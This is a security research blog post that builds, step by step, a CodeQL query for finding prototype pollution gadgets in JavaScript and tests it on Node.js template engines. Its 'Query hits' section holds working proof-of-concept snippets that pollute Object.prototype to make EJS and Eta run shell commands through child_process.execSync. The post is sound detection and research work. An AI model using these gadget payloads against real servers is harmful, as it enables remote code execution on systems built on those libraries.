TL;DR

Following the latest CodeQL introduction post, and inspired by a challenge from SonarSource’s #codeadvent2021 and SecurityMB’s October 2021 challenge, I thought it would be fun to write a CodeQL query to find prototype pollution gadgets.

I started with a quick and dirty approach (to be fair, it was my first time using CodeQL for JavaScript) that already found interesting results, and then improved it step by step. Keep reading if you want to see the entire process along with some interesting results!

Prototype Pollution

The objective of this post is not to explain what a prototype pollution vulnerability is. In short, being able to edit an object’s prototype, or Object’s prototype, through their properties lets an attacker pollute it and likely change the behaviour of the affected code maliciously.
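
As a quick refresher, here is a minimal sketch of how pollution can happen. The naiveMerge helper and the attackerInput payload are hypothetical and written only for illustration; they are not taken from any of the libraries discussed later.

```javascript
// Hypothetical vulnerable helper: a naive recursive merge that does not
// filter special keys such as "__proto__".
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === "object") {
      if (typeof target[key] !== "object" || target[key] === null) {
        target[key] = {};
      }
      // For key "__proto__", target[key] is Object.prototype itself.
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an own property, so Object.keys sees it.
const attackerInput = JSON.parse('{"__proto__": {"polluted": "yes"}}');
naiveMerge({}, attackerInput);

// An unrelated, freshly created object now inherits the property.
const unrelated = {};
const pollutedValue = unrelated.polluted;

// Clean up so the rest of the process is not affected.
delete Object.prototype.polluted;
const valueAfterCleanup = {}.polluted;
```

After the merge, every plain object in the process sees polluted until the property is deleted again.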

Gadgets

We may understand [insert vulnerability here] gadgets as code snippets or behaviours that help a vulnerability to happen. In this case, a prototype pollution gadget is a read of an object property that is not defined on the object itself, whose value flows to a JS-executing function (such as eval or Function).

  • The property must not be defined on the object itself, because a property read falls back to the object’s prototype chain only when the object has no own property with that name.
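
To make the idea concrete, here is a small sketch of a gadget. The compile function and its body option are hypothetical names chosen for this example; the pollution is done by hand to keep the snippet short.

```javascript
// Hypothetical template compiler: `options.body` is an optional setting that
// callers normally leave undefined, and its value reaches `Function`.
function compile(options) {
  const body = options.body ? options.body : "return 'rendered';";
  return new Function(body);
}

// Without pollution, the default body is used.
const beforePollution = compile({})();

// With pollution, the undefined own property falls back to Object.prototype.
Object.prototype.body = "return 'injected';";
const afterPollution = compile({})();

// Clean up so the rest of the process is not affected.
delete Object.prototype.body;
```

The object passed to compile is an empty literal in both calls; only the state of Object.prototype differs.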

CodeQL query development

You may find the final query at #final-query.

The first approach looked like the following snippet:

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  // Any {} that does not set a custom __proto__
  override predicate isSource(DataFlow::Node source) {
    exists(DataFlow::ObjectLiteralNode object |
      not object.toString().matches("%\\_\\_proto\\_\\_%") and
      source = object
    )
  }

  // An expression which may be evaluated as JavaScript
  override predicate isSink(DataFlow::Node sink) { sink instanceof EvalJavaScriptSink }

  // Make a valid step: variable = {} -> Object.create(variable)
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::SourceNode c, DataFlow::CallNode call |
      c.toString() = "Object.create" and
      call = c.getACall() and
      nodeFrom = call.getArgument(0) and
      nodeTo = call
    )
  }
}

from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@", source.getNode(), "Empty dict",
  sink.getNode(), "this eval-alike call."

However, almost every part of it can be improved.

Source

override predicate isSource(DataFlow::Node source) {
    exists(DataFlow::ObjectLiteralNode object |
        not object.toString().matches("%\\_\\_proto\\_\\_%") and
        source = object
    )
}

Some of you may have wanted to erase me from the universe for using toString() to check a property access, but that’s the only thing I thought about before digging into CodeQL for JavaScript’s juice.

Playing with objects' properties:

  • a = {}: ObjectLiteralNode declaration.
  • a.foo = "bar": PropWrite
    • getBase() is a use of the object from the first point (so getBase().getALocalSource() is what we will be using to correlate both nodes).
    • getPropertyName() returns foo.
    • getRhs() returns "bar".
  • eval(a.foo): eval’s first argument is a PropRead with the same getBase() and getPropertyName() predicates.

With these predicates, the source can be modelled as its own class:

class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}
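
The runtime behaviour behind this class can be sketched in plain JavaScript. This is only an illustration of why writing null to the prototype matters, not a description of exactly which nodes the class matches; the gadget property name is hypothetical.

```javascript
// Pollute Object.prototype by hand for the duration of the example.
Object.prototype.gadget = "polluted";

// A plain literal inherits from Object.prototype.
const plain = {};

// These three objects have no prototype, so there is nothing to fall back to.
const literalNullProto = { __proto__: null };
const assignedNullProto = {};
assignedNullProto.__proto__ = null;
const createdNullProto = Object.create(null);

const plainRead = plain.gadget;
const literalRead = literalNullProto.gadget;
const assignedRead = assignedNullProto.gadget;
const createdRead = createdNullProto.gadget;

// Clean up so the rest of the process is not affected.
delete Object.prototype.gadget;
```

Only the plain literal sees the polluted value, which is why such objects are the interesting sources.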

Sink

override predicate isSink(DataFlow::Node sink) {
    sink instanceof EvalJavaScriptSink 
}

The sink’s evolution focuses on reporting more precise results, such as tainted in tainted + foo, when the concatenation is the last step of a flow.

class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

Furthermore, binding the EvalJavaScriptSink to a field lets us get the call that takes it as an argument, which is exposed through the getCall() predicate used in the select clause of the query.
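
For reference, this is the kind of JavaScript the concatenation case is about. The makeGreeter function and the greeting property are hypothetical; the point is that the argument of Function is a whole concatenation, while only one operand comes from the object.

```javascript
// Hypothetical code generator: the argument passed to `Function` is the
// concatenation, but only `config.greeting` is read from the object.
function makeGreeter(config) {
  const suffix = "; return greeting;";
  return new Function("var greeting = " + config.greeting + suffix);
}

// Intended use: the caller defines the property itself.
const intended = makeGreeter({ greeting: "'hello'" })();

// Gadget use: the property is missing and comes from the polluted prototype.
Object.prototype.greeting = "'injected'";
const hijacked = makeGreeter({})();

// Clean up so the rest of the process is not affected.
delete Object.prototype.greeting;
```

Reporting the config.greeting operand instead of the whole argument points directly at the property read that matters.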

Additional taint step

override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::SourceNode c, DataFlow::CallNode call |
        c.toString() = "Object.create" and
        call = c.getACall() and
        nodeFrom = call.getArgument(0) and
        nodeTo = call
    )
}

This taint step lets CodeQL know that an ObjectLiteralNode may flow to the first argument of Object.create, whose result inherits from it and is therefore also a valid gadget.
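
A short sketch of why the result of Object.create is worth tracking: the new object inherits from its argument, which in turn inherits from Object.prototype. The variable and property names are only illustrative.

```javascript
// `derived` has `base` as its prototype, and `base` has Object.prototype.
const base = {};
const derived = Object.create(base);

const chainIsAsExpected =
  Object.getPrototypeOf(derived) === base &&
  Object.getPrototypeOf(base) === Object.prototype;

// Pollution therefore reaches both objects.
Object.prototype.gadget = "polluted";
const viaBase = base.gadget;
const viaDerived = derived.gadget;

// Clean up so the rest of the process is not affected.
delete Object.prototype.gadget;
```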

We will be using globalVarRef and its getAMemberCall predicate to properly get the Object.create call (instead of relying on SourceNode’s toString).

override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
        objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
        nodeFrom = objectCreate.getArgument(0) and
        nodeTo = objectCreate
    )
}

Sanitizer

override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
        leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
        not leftSource = orExpr.getLeftOperand() and
        not leftSource instanceof NullLiteral and
        not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
        sanitizer.asExpr() = orExpr.getRightOperand()
    )
}

We want to stop tracking flow when a LogOrExpr (foo || bar) holds an ObjectLiteralNode as its right operand and a defined, truthy value as its left operand, since the left operand is then the one that gets used.
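
The JavaScript behaviour this sanitizer relies on can be sketched as follows. The pickOptions function is a hypothetical example of the foo || {} pattern.

```javascript
// Hypothetical helper using the `foo || {}` pattern.
function pickOptions(userOptions) {
  return userOptions || {};
}

// Truthy left operand: it is returned as-is and the literal is never used.
const given = { name: "template" };
const keptLeftOperand = pickOptions(given) === given;

// Falsy left operand: the fresh literal on the right is what flows onwards.
const fallback = pickOptions(undefined);
const usedLiteral =
  Object.keys(fallback).length === 0 &&
  Object.getPrototypeOf(fallback) === Object.prototype;
```

Only in the second case does the empty literal on the right-hand side reach later property reads.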

Debugging

Let’s make query development easier and more fun by:

  • Using Backward DataFlow: Set isSource() to any(), so we get every single node flowing to our specific sink.
  • Using Forward DataFlow: Set isSink() to any(), so we get the flow from our specific source to any node.
  • Restricting sources and sinks to specific files in order to limit where results are reported.
  • Using a custom PathNode implementation to get the QL class used in each step of the flow path.

See #debugging-query.

Query hits

In order to test the query, I ran it against all sources listed in Template engines for NodeJS.

LGTM Results

Some snippets to test locally:

// edited from https://twitter.com/sonarsource/status/1471148042577350659

const express = require('express');

const app = express();
app.set('view engine', 'ejs');
app.set('views', __dirname + '/views');

cmd = "sleep 10";

Object.prototype.outputFunctionName = `a;process.mainModule.require('child_process').execSync('${cmd}');//`;
Object.prototype.client = "notEmpty"; Object.prototype.escapeFunction = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.client = "notEmpty"; Object.prototype.escape = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.localsName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
Object.prototype.destructuredLocals = ["/*", `*/a=process.mainModule.require('child_process').execSync('${cmd}');//`];

app.get('/ejs', (req, res) => {
    res.render('template', {foo: "bar"})
})

app.listen(1337);

// edited from https://eta.js.org/docs/examples/express

var express = require("express")
var app = express()
var eta = require("eta")

app.engine("eta", eta.renderFile)
app.set("view engine", "eta")
app.set('views', __dirname + '/views');

cmd = "sleep 10";

Object.prototype.useWith = "notEmpty"; Object.prototype.varName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;

app.get("/eta", function (req, res) {
    res.render("template", {foo: "bar"})
})

app.listen(1337)

Final query

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph

/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as a sanitizer since flows between the same source and sink
 * AST nodes may differ (i.e., one path in the source-sink flow may not pass
 * through these property writes).
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) { source instanceof BadIfPollutedSource }

  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) { sink instanceof CustomEvalJavaScriptSink }

  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }

  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   *  and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}

from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()

Debugging query

semmle.javascript.custom.Debug:

private import javascript

module Debug {
  /**
   * If `true`, show the QL class for each flow step.
   */
  boolean getDebug() { result = false }

  /**
   * If `true`, apply Backward Dataflow.
   */
  boolean getBackward() { result = false }

  /**
   * If `true`, apply Forward Dataflow.
   */
  boolean getForward() { result = false }

  /**
   * Returns a `File` with a specific basename.
   */
  File getFile() {
    result.getBaseName().matches("%%") and not result.getBaseName().matches("test.js")
  }
}

class CustomPathNode extends DataFlow::PathNode {
  CustomPathNode() { this = this }

  override string toString() {
    if Debug::getDebug() = true
    then result = this.getNode().toString() + ", " + this.getNode().getAQlClass()
    else result = this.getNode().toString()
  }
}

Main query:

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
import semmle.javascript.custom.Debug

/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as a sanitizer since flows between the same source and sink
 * AST nodes may differ (i.e., one path in the source-sink flow may not pass
 * through these property writes).
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) {
    (if Debug::getBackward() = true then any() else source instanceof BadIfPollutedSource) and
    source.getFile() = Debug::getFile()
  }

  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) {
    (if Debug::getForward() = true then any() else sink instanceof CustomEvalJavaScriptSink) and
    sink.getFile() = Debug::getFile()
  }

  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }

  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   *  and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}

from BadIfPollutedConfig cfg, CustomPathNode source, CustomPathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()

The end

I hope you found it interesting and had fun reading it!

Jorge.